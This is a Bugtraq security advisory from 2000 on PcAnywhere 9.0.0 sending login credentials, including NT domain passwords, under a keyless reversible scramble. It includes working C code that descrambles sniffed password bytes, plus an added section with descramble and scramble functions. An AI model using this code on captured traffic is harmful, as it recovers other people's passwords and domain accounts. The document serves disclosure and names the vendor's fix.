[14483] in bugtraq
PcAnywhere weak password encryption
daemon@ATHENA.MIT.EDU (Pascal Longpre)
Thu Apr 6 18:11:02 2000
Message-Id: <20000406030958.23902.qmail@securityfocus.com>
Date: Thu, 6 Apr 2000 03:09:58 -0000
Reply-To: Pascal Longpre <longprep@HOTMAIL.COM>
From: Pascal Longpre <longprep@HOTMAIL.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
PcAnywhere weak password encryption
---- Discussion ----
PcAnywhere 9.0.0 set to its default security value uses a
trivial encryption method so user names and passwords are
not sent directly in clear. Since most users have the
encryption method set to either "none" or "PcAnyWhere",
their passwords are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can
authenticate users based on their NT domain accounts and
passwords. When the user logs on, they are prompted for their NT
username and password. They are then "encrypted" through
the PcAnywhere method and decrypted by the host computer
for validation by the NT domain controller. Someone
snooping on the traffic between the two stations will
unlock both the PcAnywhere and NT account. All that without
even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at
all. Username and password are sent in clear. I haven't
tested version 8 yet.
--- Solution ---
Symantec says that this was not intended to be real
encryption and suggests the use of the Public or Symmetric
key option instead. More info can be found at:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
--- Exploit ---
The Username / password are contained in a string two
packets away from the "Enter your login name" and "Enter
your password" prompts. They are preceded by 0x06. The next
number is the string length.
Here is the code of the exploit:
#include <stdio.h>

int main(void) {
    // sniffed bytes; unsigned so that values of 0x80 and above keep their value
    unsigned char password[128];
    char cleartext[128];
    int i, len;

    // input the sniffed hex values here
    // Encrypted example of the 'aaaaa' password
    password[0] = 0xca;
    password[1] = 0xab;
    password[2] = 0xcb;
    password[3] = 0xa8;
    password[4] = 0xca;
    // the length byte that follows the 0x06 marker; used instead of strlen()
    // so that a 0x00 byte inside the encrypted string does not cut it short
    len = 5;

    // first byte: subtracted from a constant, then offset back to ASCII
    cleartext[0] = (char)((0xca - password[0] + 0x61) & 0xff);
    // following bytes: XOR with the previous encrypted byte and the position
    for (i = 1; i < len; i++)
        cleartext[i] = (char)(password[i - 1] ^ password[i] ^ (i - 1));
    cleartext[len] = '\0';

    printf("password is %s \n", cleartext);
    return 0;
}
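The descrambling step the exploit above performs, as an added example that is not part of the original post, written as a reusable function next to its inverse (the scrambling step, obtained by solving the post's formula for each encrypted byte); the function names, the PCA_SAMPLE_AAAAA constant and the 128-byte buffers are this example's own assumptions. Seeing the inverse makes the weakness plain: no key enters at any point, so anyone holding the bytes can undo them, which is why the Public or Symmetric key option is the actual fix.

```c
#include <stdio.h>
#include <string.h>

/* Scrambled form of 'aaaaa', the sample sniffed in the post above. */
const unsigned char PCA_SAMPLE_AAAAA[5] = { 0xca, 0xab, 0xcb, 0xa8, 0xca };
/* Descramble n bytes with the post's formula. n comes from the length byte
 * after the 0x06 marker, so a 0x00 inside the field does not end the string. */
void pca_descramble(const unsigned char *enc, size_t n, char *out)
{
    size_t i;
    if (n > 0)
        out[0] = (char)((0xca - enc[0] + 0x61) & 0xff);
    for (i = 1; i < n; i++)
        out[i] = (char)(enc[i - 1] ^ enc[i] ^ (i - 1));
    out[n] = '\0';
}
/* Inverse of pca_descramble, obtained by solving the formula for enc[i]. No key
 * enters: each byte depends only on the cleartext, the previous byte and the
 * position, so the same password always yields the same bytes on the wire. */
void pca_scramble(const char *clear, size_t n, unsigned char *out)
{
    size_t i;
    if (n > 0)
        out[0] = (unsigned char)(0xca + 0x61 - (unsigned char)clear[0]);
    for (i = 1; i < n; i++)
        out[i] = (unsigned char)((unsigned char)clear[i] ^ out[i - 1] ^ (i - 1));
}
/* 1 if enc[0..n) descrambles to expect, else 0. */
int pca_descrambles_to(const unsigned char *enc, size_t n, const char *expect)
{
    char buf[128];
    if (n >= sizeof buf) return 0;
    pca_descramble(enc, n, buf);
    return strcmp(buf, expect) == 0;
}
/* 1 if clear scrambles exactly to enc[0..n), else 0. */
int pca_scrambles_to(const char *clear, const unsigned char *enc, size_t n)
{
    unsigned char buf[128];
    if (n >= sizeof buf || strlen(clear) != n) return 0;
    pca_scramble(clear, n, buf);
    return memcmp(buf, enc, n) == 0;
}
int main(void)
{
    char out[8];
    pca_descramble(PCA_SAMPLE_AAAAA, 5, out);
    printf("sample descrambles to: %s\n", out); /* prints "aaaaa" */
    return 0;
}
```

Because every byte depends only on its predecessor and its position, a prefix of the wire bytes descrambles to the same prefix of the password, so even a truncated capture leaks the leading characters.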